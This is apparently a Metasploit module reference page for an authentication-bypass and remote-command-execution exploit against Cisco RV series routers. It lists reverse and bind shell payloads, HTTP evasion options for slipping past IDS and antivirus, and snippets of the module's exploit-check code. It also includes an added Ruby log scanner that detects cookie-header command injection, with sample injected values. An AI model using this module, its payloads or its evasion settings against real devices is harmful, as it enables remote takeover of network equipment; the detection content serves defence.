Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript
                                                          )
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will N
                                                          OT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect f
                                                          ails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempt
                                                          s
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/cisco_rv_series_authbypass_and_rce module can exploit:

msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/cisco_rv_series_authbypass_and_rce exploit:

msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   49  payload/generic/ssh/interact                                 normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/cisco_rv_series_authbypass_and_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Didn't receive a response from the target.


Here is a relevant code snippet related to the "Didn't receive a response from the target." error message:

134:	  # The system doesn't have a good way to snag the version. This check attempts the exploit
135:	  # with a command that returns immediately (id) and checks that the response looks like
136:	  # how a vulnerable target would respond.
137:	  def check
138:	    res = send_exploit('id')
139:	    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140:	    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:	
142:	    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143:	      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144:	    end

The target did not respond with a 200 OK.


Here is a relevant code snippet related to the "The target did not respond with a 200 OK." error message:

135:	  # with a command that returns immediately (id) and checks that the response looks like
136:	  # how a vulnerable target would respond.
137:	  def check
138:	    res = send_exploit('id')
139:	    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140:	    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:	
142:	    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143:	      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144:	    end
145:	

The device responded to exploitation with a 200 OK.


Here is a relevant code snippet related to the "The device responded to exploitation with a 200 OK." error message:

138:	    res = send_exploit('id')
139:	    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140:	    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:	
142:	    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143:	      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144:	    end
145:	
146:	    CheckCode::Safe('The target did not respond with an expected payload.')
147:	  end
148:	

The target did not respond with an expected payload.


Here is a relevant code snippet related to the "The target did not respond with an expected payload." error message:

141:	
142:	    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143:	      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144:	    end
145:	
146:	    CheckCode::Safe('The target did not respond with an expected payload.')
147:	  end
148:	
149:	  def execute_command(cmd, _opts = {})
150:	    # parsing of the cookie field is thrown off by ;. Replacing with && works fine, but the only
151:	    # downside is if the payload fails then it won't clean up after itself. Oddly, device's sh

The target did not respond with a 200 OK


Here is a relevant code snippet related to the "The target did not respond with a 200 OK" error message:

155:	
156:	    # unix command holds the connection open. Meterpreter should not. I think this logic is fine though.
157:	    # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
158:	    # then that is a clear sign that :unix_cmd was successful
159:	    if target['Type'] != :unix_cmd
160:	      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
161:	      body_json = res.get_json_document
162:	      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
163:	    end
164:	
165:	    print_good('Exploit successfully executed.')

The target did not respond with a JSON body


Here is a relevant code snippet related to the "The target did not respond with a JSON body" error message:

157:	    # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
158:	    # then that is a clear sign that :unix_cmd was successful
159:	    if target['Type'] != :unix_cmd
160:	      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
161:	      body_json = res.get_json_document
162:	      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
163:	    end
164:	
165:	    print_good('Exploit successfully executed.')
166:	  end
167:	
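The snippets above show the shape of the exploit traffic: an unauthenticated request to the /upload endpoint whose Cookie header carries the injected command, joined with `&&` because the device's cookie parsing is thrown off by `;`. The following Ruby script is an added detection example, not code from this page or from the Metasploit module: it walks JSON-lines records from a reverse proxy or WAF placed in front of the router's web UI and flags /upload requests whose Cookie header contains shell metacharacters. The log format and field names (`ts`, `src`, `method`, `path`, `cookie`) are assumed for the example, and the sample records are constructed.

```ruby
require 'json'

# Constructed sample of JSON-lines proxy/WAF records for this example (not real traffic).
# Field names are an assumption of this example; adapt them to your own log schema.
SAMPLE_LOG = <<~LOG
  {"ts":"2022-01-29T18:00:01Z","src":"203.0.113.5","method":"POST","path":"/upload","cookie":"sessionid=abc123"}
  {"ts":"2022-01-29T18:00:02Z","src":"198.51.100.7","method":"POST","path":"/upload","cookie":"sessionid=x && id"}
  {"ts":"2022-01-29T18:00:03Z","src":"198.51.100.7","method":"POST","path":"/upload","cookie":"sessionid=x;`id`"}
  {"ts":"2022-01-29T18:00:04Z","src":"192.0.2.9","method":"GET","path":"/","cookie":"sessionid=ok"}
LOG

# Shell separators and substitution syntax that have no place in a session cookie.
# && is the separator the module itself uses; ; and friends are included so other
# variants of the same injection are not missed.
SHELL_META = /&&|\|\||;|`|\$\(|\|/

# Classify one parsed record: nil for benign, otherwise a short reason string.
def upload_request_reason(rec)
  return nil unless rec['path'].to_s.start_with?('/upload')
  cookie = rec['cookie'].to_s
  return nil unless cookie.match?(SHELL_META)

  'shell metacharacters in Cookie header on /upload'
end

# Walk JSON-lines text and return [src, ts, reason] for every flagged request.
# Malformed lines are skipped rather than aborting the scan.
def scan_upload_log(text)
  text.each_line.filter_map do |line|
    line = line.strip
    next if line.empty?

    rec = begin
      JSON.parse(line)
    rescue JSON::ParserError
      next
    end
    reason = upload_request_reason(rec)
    reason && [rec['src'], rec['ts'], reason]
  end
end

if $PROGRAM_NAME == __FILE__
  scan_upload_log(SAMPLE_LOG).each { |src, ts, why| puts "#{ts} #{src}: #{why}" }
end
```

Run against the constructed sample, the script reports the two requests from 198.51.100.7 and ignores the ordinary session cookie and the unrelated GET. Because the page states that the device does not adequately verify the Authorization header on /upload, the presence of credentials in a flagged request should not by itself lower the alert's priority.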



Authors


  • Takeshi Shiomitsu
  • jbaines-r7

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
